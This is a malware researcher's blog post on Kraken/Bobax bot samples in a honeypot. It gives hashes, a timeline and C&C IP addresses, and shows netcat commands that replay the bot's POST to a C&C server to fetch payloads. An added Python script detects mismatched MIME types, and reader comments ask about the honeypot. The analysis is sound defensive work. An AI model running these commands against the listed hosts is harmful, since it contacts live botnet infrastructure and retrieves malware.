Kraken Reverts to HTTP

Following a friendly heads up from someone yesterday morning, I re-loaded the
following Kraken samples into my honeypot:

1d51463150db06bc098fef335bc64971
65b958bf6f5eddca3d9455354af08b6f
6ec7d67d5553cbec2a99c7fbe385a729
7ecef2f126e66e7270afa7b803f715bc
8fd8c67103ec073d9303a7fbc702f89a

and began monitoring them. Each sample proceeded to update itself; the
updated binary is around 160KB, is given a random name and placed in the
system32 directory, and no longer has an image file icon.

The names/MD5 values of samples I got are:

26bd8e696629edba4a1d610d1062b3f1 jtliutnj.exe
36a8c8cce65c9ab46fca127de9dcc5d1 niksojrjbg.exe
b5f65d971d7362512dafdb473ef5888d xfkmrb.exe
5f94989145b4bf69cf81c223b15ec653 yy.exe
5c9274a4483ed540fd433a2cd885e561 zp.exe

As someone mentioned, it does indeed appear that Kraken/Bobax has changed
(perhaps reverted?) its C&C to HTTP. The honeypot session for
1d51463150db06bc098fef335bc64971 goes something like the following:

UTC 15:30 - Honeypot infected with 1d51463150db06bc098fef335bc64971.
UTC 15:45 - niksojrjbg.exe appears in system32 directory.
UTC 15:50 - Last TCP/UDP 447 packets (host 209.160.65.66) observed.
UTC 16:00 - Spam run commences.
UTC 16:10 - First observed HTTP communication with C&C.

The samples do not appear to be using DNS to obtain IPs of the C&C
servers. The C&C IPs I've been able to identify from the samples are
208.101.52.82, 208.101.54.243, and 208.101.42.28. Communication is
performed by the victim making an HTTP POST (poststring attached);
receipt of binary data with a bogus MIME type follows:

paul:~$ cat kraken.poststring | nc 208.101.52.82 80 > file1
...
paul:~$ cat kraken.poststring | nc 208.101.52.82 80 > file5

paul:~$ for i in file*; do head -n 5 $i; echo '--'; done;
HTTP/1.1 200 OK
Server: Apache
Content-Length: 13958
Connection: Close
Content-Type: video/mpeg
--
HTTP/1.1 200 OK
Server: Apache
Content-Length: 13958
Connection: Close
Content-Type: application/x-tar
--
HTTP/1.1 200 OK
Server: Apache/2.0.54
Content-Length: 13958
Connection: Close
Content-Type: image/gif
--
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 13958
Connection: Close
Content-Type: audio/x-wav
--
HTTP/1.1 200 OK
Server: Apache/1.3.33
Content-Length: 13958
Connection: Close
Content-Type: audio/x-wav
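
The two signals visible in that session, a Content-Type that does not describe the body and identical-length payloads served under varying Content-Type and Server headers, can be checked mechanically. The script below is an added example, not code from the original post: it parses raw HTTP responses of the kind captured with `nc` above, compares the declared MIME type against the body's magic bytes, and reports header drift across repeated fetches. The five responses it analyses are constructed sample data modelled on the headers shown in the post; the bodies are made-up bytes, not the real payload, and the magic-byte table is a deliberately small assumption that only covers the MIME types the post shows.

```python
"""Flag HTTP responses whose declared Content-Type does not fit the body.

Added example (not from the original post). Two checks are implemented:
  * the declared Content-Type disagrees with the body's leading bytes, and
  * repeated fetches return identical-length bodies under varying
    Content-Type / Server headers.
The sample responses at the bottom are constructed, modelled on the post's
headers; the bodies are opaque filler bytes, not the real payload.
"""
from collections import Counter

# Minimal magic-byte table (an assumption; covers only the types the post shows).
MAGIC = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "audio/x-wav": (b"RIFF",),
    "video/mpeg": (b"\x00\x00\x01\xba", b"\x00\x00\x01\xb3"),
}


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate LF-only captures
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def body_matches_type(ctype: str, body: bytes) -> bool:
    """True if the body's leading bytes are plausible for the declared MIME type."""
    ctype = ctype.split(";")[0].strip().lower()
    if ctype == "application/x-tar":
        return body[257:262] == b"ustar"  # tar keeps its magic at offset 257
    sigs = MAGIC.get(ctype)
    if sigs is None:
        return True  # type not in the table: nothing to compare against
    return any(body.startswith(s) for s in sigs)


def analyse(responses):
    """Return findings over a list of raw responses to the same request."""
    parsed = [parse_response(r) for r in responses]
    mismatches = [(i, h.get("content-type", ""))
                  for i, (_, h, b) in enumerate(parsed)
                  if not body_matches_type(h.get("content-type", ""), b)]
    lengths = {h.get("content-length") for _, h, _ in parsed}
    ctypes = Counter(h.get("content-type") for _, h, _ in parsed)
    servers = Counter(h.get("server") for _, h, _ in parsed)
    return {
        "type_mismatch": mismatches,
        "same_length_varying_type": len(lengths) == 1 and len(ctypes) > 1,
        "varying_server": len(servers) > 1,
    }


# Constructed filler body: 16 opaque bytes standing in for the real 13958-byte payload.
FAKE_BODY = bytes(range(0x80, 0x90))


def make_response(server: str, ctype: str, body: bytes = FAKE_BODY) -> bytes:
    """Build a raw response in the shape the post's `head -n 5` output shows."""
    head = (f"HTTP/1.1 200 OK\r\nServer: {server}\r\nContent-Length: {len(body)}\r\n"
            f"Connection: Close\r\nContent-Type: {ctype}\r\n\r\n")
    return head.encode("ascii") + body


# Constructed sample set mirroring the five responses in the post.
SAMPLE_RESPONSES = [
    make_response("Apache", "video/mpeg"),
    make_response("Apache", "application/x-tar"),
    make_response("Apache/2.0.54", "image/gif"),
    make_response("Microsoft-IIS/6.0", "audio/x-wav"),
    make_response("Apache/1.3.33", "audio/x-wav"),
]

if __name__ == "__main__":
    findings = analyse(SAMPLE_RESPONSES)
    for key, value in findings.items():
        print(f"{key}: {value}")
```

To run it over real captures, read each `file1` .. `file5` as bytes and pass the list to `analyse()`; a genuine web server handing out the same resource will keep one Content-Type and one Server string, so either flag firing on a host that a process keeps POSTing to is worth a closer look.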

I have 3 or 4 other binaries

I have 3 or 4 other binaries along with the 160, 1 at least seems unique, all maybe.

I'm just up 75 a piece, we should make contact.

I'd be interested in more

I'd be interested in more information regarding your Honeypot, especially the Honeypot Session and its Logging Output. Having no experience with High Interaction HoPo's yet: What are you using? Is it Sebek?

about the HoneyPot

Hello,
I'm interested in your honeypot; which honeypot are you using, please?